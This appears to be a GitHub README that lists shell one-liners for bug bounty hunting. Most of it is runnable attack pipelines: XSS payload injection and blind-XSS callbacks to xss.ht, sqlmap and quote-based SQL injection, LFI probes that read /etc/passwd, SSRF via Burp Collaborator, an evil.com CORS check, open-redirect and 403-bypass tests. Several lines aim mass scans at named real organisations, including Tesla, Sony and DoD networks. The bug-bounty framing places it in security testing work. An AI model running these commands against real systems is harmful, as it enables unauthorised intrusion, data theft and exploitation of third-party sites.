Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

https://github.com/twseptian/oneliner-bugbounty

oneliner commands for bug bounties

Last synced: about 1 month ago

README


# oneliner commands for bug bounties

## Find Subdomain
> projectdiscovery
```bash
subfinder -d target.com -silent | httpx -silent -o urls.txt
```
## Search Subdomain using Gospider
> https://github.com/KingOfBugbounty/KingOfBugBountyTips/
```bash
gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew
```

## Find .git/HEAD
> @ofjaaah
```bash
curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
```

## Check .git/HEAD
> @ofjaaah
```bash
# download the domain list first, then feed it through the pipeline (the original piped wget's stdout into cat, which ignored it)
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
```

## Find XSS
> cihanmehmet
### Single target
```bash
gospider -s "https://www.target.com/" -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
```
### Multiple target
```bash
gospider -S urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
```
## Find XSS
> dwisiswant0
```bash
#!/bin/bash

hakrawler -url "${1}" -plain -usewayback -wayback | grep "${1}" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | dalfox pipe -b https://your.xss.ht

# save to .sh, and run bash program.sh target.com
```
## Kxss to search param XSS
> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)
```bash
echo http://testphp.vulnweb.com/ | waybackurls | kxss
```

## XSS hunting multiple
> @ofjaaah
```bash
gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22>'
```

## BXSS - Blind XSS in Parameters
> [ethicalhackingplayground](https://github.com/ethicalhackingplayground/bxss/)
```bash
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '">' -parameters
```

## Blind XSS In X-Forwarded-For Header
> [ethicalhackingplayground](https://github.com/ethicalhackingplayground/bxss/)
```bash
subfinder -d target.com | gau | bxss -payload '">' -header "X-Forwarded-For"
```

## Gxss with single target
> @KathanP19
```bash
echo "testphp.vulnweb.com" | waybackurls | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe
```

## XSS using gf with single target
> @infosecMatter
```bash
echo "http://testphp.vulnweb.com/" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf xss | anew
```

## XSS without gf
> HacktifyS
```bash
waybackurls testphp.vulnweb.com | grep '=' | qsreplace '">alert(1)' | while read host; do curl -s --path-as-is --insecure "$host" | grep -qs "alert(1)" && echo -e "$host \033[0;31mVulnerable\033[0m"; done
```
or
```bash
gospider -S target.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '">alert(1)' | while read host; do curl -s --path-as-is --insecure "$host" | grep -qs "alert(1)" && echo -e "$host \033[0;31mVulnerable\033[0m"; done
```

## XSS qsreplace
> @KingOfBugBounty
```bash
gospider -a -s https://site.com -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22>'
```

## XSS httpx
> @ofjaah
```bash
httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace ""
```
## Automating XSS using Dalfox, GF and Waybackurls
> [Automating XSS using Dalfox, GF and Waybackurls](https://medium.com/bugbountywriteup/automating-xss-using-dalfox-gf-and-waybackurls-bc6de16a5c75)
```bash
# replace YOUR-XSS-HUNTER-DOMAIN with your own blind-XSS callback host (e.g. yours.xss.ht)
cat test.txt | gf xss | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b YOUR-XSS-HUNTER-DOMAIN
```

## XSS from javascript hidden params
> @0xJin
```bash
assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
```

## XSS freq
> @ofjaaah
```bash
echo http://testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '">' | freq
```

## Find XSS
> @skothastad
```bash
cat targets | waybackurls | anew | grep "=" | gf xss | nilo | Gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403
```

> @mamunwhh
```bash
cat hosts.txt | ffuf -w - -u "FUZZ/sign-in?next=javascript:alert(1);" -mr "javascript:alert(1)"
```

> @SaraBadran18
```bash
cat domainlist.txt | subfinder | dnsx | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | uro | dalfox pipe -b your.xss.ht -o xss.txt
```

## Find XSS + knoxss
> @ofjaaah
```bash
echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh
```

## Dump In-Scope Assets from Bounty Program
### BugCrowd Programs
> @dwisiswant0
```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
```

## Recon.dev
> @ofjaaah
```bash
curl "https://recon.dev/api/search?key=YOURAPIKEY&domain=target.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew
```

## Jaeles scan to bugbounty targets.
> @KingOfBugbounty
```bash
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @
```
> @ofjaah
```bash
curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}'
```

## Nuclei scan to bugbounty targets.
> @hack_fish
```bash
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | httpx -silent | xargs -n 1 gospider -o output -s ; cat output/* | egrep -o 'https?://[^ ]+' | nuclei -t ~/nuclei-templates/ -o result.txt
```
> @ofjaah
```bash
amass enum -passive -norecursive -d target.com -o domain ; httpx -l domain -silent -threads 10 | nuclei -t nuclei-templates -o result -timeout 30
```

## Endpoints, by apks
> @ofjaaah
```bash
apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|http://schemas.android\|google\|http://goo.gl"
```

## Find Subdomains TakeOver
> hahwul
```bash
subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
```

## CORS Misconfiguration
> manas_hunter
```bash
site="https://example.com"; gau "$site" | while read url; do target=$(curl -s -I -H "Origin: https://evil.com" -X GET "$url"); if echo "$target" | grep -q 'https://evil.com'; then echo "[Potential CORS Found] $url"; else echo "Nothing on $url"; fi; done
```

## SQL Injection
> @ofjaaah
```bash
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 1
```

## Search SQL injection using qsreplace (look for syntax errors in responses)
> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)
```bash
grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n"
```

## SQLi-TimeBased scanner
> @slv0d
```bash
gau DOMAIN.tld | sed 's/=[^=&]*/=YOUR_PAYLOAD/g' | grep '?.*=' | sort -u | while read host;do (time -p curl -Is "$host") 2>&1 | awk '/real/ { r=$2;if (r >= TIME_OF_SLEEP ) print h " => SQLi Time-Based vulnerability"}' h="$host" ;done
```

## Recon to search SSRF Test
> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)
```bash
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
```

## Using shodan & Nuclei
> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)

Shodan is a search engine that lets the user find specific types of computers connected to the internet. awk cuts the text and prints the third column. httpx is a fast, multi-purpose HTTP toolkit, run here with -silent. Nuclei is a fast tool for configurable targeted scanning based on templates, offering massive extensibility and ease of use; you need to download the nuclei templates first.
```bash
shodan domain DOMAIN_TO_BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/
```

## Using Chaos with jaeles ("How did I find a critical today?")
> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)

Chaos is projectdiscovery's subdomain recon dataset. The output of `chaos -d domain.com` needs to be treated as http or https, so we pipe it through httpx to get live results. We then use anew, a tool from @TomNomNom that removes duplicates, to prepare the output for import into jaeles, which scans each host using its signatures.
```bash
chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @
```
Edited: **if we don't have a chaos api_key**
```bash
cat domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s ~/Tools/jaeles-signatures -u @
```

## Check blind SSRF in Header, Path, Host & check XSS via web cache poisoning
> @sratarun
```bash
cat domains.txt | assetfinder --subs-only| httprobe | while read url; do xss1=$(curl -s -L $url -H 'X-Forwarded-For: xss.yourburpcollabrotort'|grep xss) xss2=$(curl -s -L $url -H 'X-Forwarded-Host: xss.yourburpcollabrotort'|grep xss) xss3=$(curl -s -L $url -H 'Host: xss.yourburpcollabrotort'|grep xss) xss4=$(curl -s -L $url --request-target http://burpcollaborator/ --max-time 2); echo -e "\e[1;32m$url\e[0m""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET http://xss.yourburpcollabrotort HTTP/1.1 ""\n";done
```

### Local File Inclusion
> @dwisiswant0
```bash
gau domain.tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
```

### Open-redirect
> @dwisiswant0
```bash
export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
```

## Directory Listing

### (Feroxbuster) common command
```bash
feroxbuster -u https://target.com --insecure -d 1 -e -L 4 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
```
### (Feroxbuster) Multiple values
> @epi052 or [feroxbuster](https://github.com/epi052/feroxbuster)
```bash
feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
```
### (Feroxbuster) Read urls from STDIN; pipe only resulting urls out to another tool
> @epi052 or [feroxbuster](https://github.com/epi052/feroxbuster)
```bash
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
```

## Search JavaScript files
> @ofjaaah
```bash
gau -subs DOMAIN |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt
```

## Uncover
> [projectdiscovery/uncover](https://github.com/projectdiscovery/uncover)
```bash
uncover -q 'http.title:"GitLab"' -silent | httpx -silent | nuclei
uncover -q target -f ip | naabu
echo jira | uncover -e shodan,censys -silent
```
> @ofjaah
```bash
uncover -q 'org:"DoD Network Information Center"' | httpx -silent | nuclei -silent -severity low,medium,high,critical
```

## Find admin login
> @0x_rood
```bash
cat domains_list.txt | httpx -ports 80,443,8080,8443 -path /admin -mr "admin"
```

## 403 login bypass
> @_bughunter
```bash
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent
```

## Recon parameters
```bash
echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive
```